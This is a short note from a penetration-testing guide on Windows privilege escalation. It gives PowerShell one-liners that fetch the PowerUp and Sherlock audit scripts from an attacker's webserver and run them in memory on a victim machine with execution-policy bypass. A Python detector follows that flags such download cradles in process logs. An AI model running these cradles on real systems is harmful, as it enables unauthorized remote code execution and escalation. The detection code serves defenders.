http://virgil-cj.blogspot.com/2018/02/escalation-time.html
These one-liners download the script from your webserver and run it directly on the victim machine.
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks"
c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/powerup.ps1') ; Invoke-AllChecks"
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/Sherlock.ps1') ; Find-AllVulns"
If the .ps1 file is already downloaded to the victim machine, run it like this:
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
I always prefer the one-liners, clean and simple, but you might lose your shell after executing it.
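Seen from the defender's side, the command lines above leave recognizable traces in process-creation logs. The following is an added example, not code from the original post or from PowerUp/Sherlock: it classifies constructed sample command lines, the function names and tag strings are hypothetical, and it assumes powershell.exe accepts `-ep` and any prefix of `-ExecutionPolicy` from `-ex` upward.

```python
import re

# Constructed process command lines, as they would appear in process-creation
# logging (e.g. Security 4688 with command line auditing, or Sysmon event 1).
SAMPLE_EVENTS = [
    r'''powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks"''',
    r'''powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/powerup.ps1') ; Invoke-AllChecks"''',
    r'''powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"''',
    r'''powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"''',
]

# In-memory download-and-execute: IEX + Net.WebClient + DownloadString(<url>)
CRADLE = re.compile(
    r"(?:iex|invoke-expression).*net\.webclient.*downloadstring\s*\(\s*['\"](https?://[^'\"]+)",
    re.I)
# Entry points of the two audit scripts named on this page
AUDIT_FUNCS = re.compile(r"\b(invoke-allchecks|find-allvulns)\b", re.I)
# A "-Name value" pair; the lookahead keeps the value available as the next name
PARAM = re.compile(r"(?<!\S)-([a-z]+)(?=\s+(\S+))", re.I)

def policy_bypass(cmdline):
    """True if any spelling of -ExecutionPolicy (-exec, -ep, ...) is set to Bypass."""
    for name, value in PARAM.findall(cmdline):
        name = name.lower()
        is_policy = name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name))
        if is_policy and value.strip("'\"").lower() == "bypass":
            return True
    return False

def classify(cmdline):
    """Return the list of finding tags for one process command line."""
    if "powershell" not in cmdline.lower():
        return []
    tags = []
    match = CRADLE.search(cmdline)
    if match:
        tags.append("download-cradle:" + match.group(1))
    if policy_bypass(cmdline):
        tags.append("execution-policy-bypass")
    for func in sorted({f.lower() for f in AUDIT_FUNCS.findall(cmdline)}):
        tags.append("privesc-audit:" + func)
    return tags

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(classify(event) or ["clean"], "<-", event[:60])
```

Matching on the parameter prefix rather than the literal string is what lets `-exec bypass` and `-ExecutionPolicy Bypass` produce the same finding.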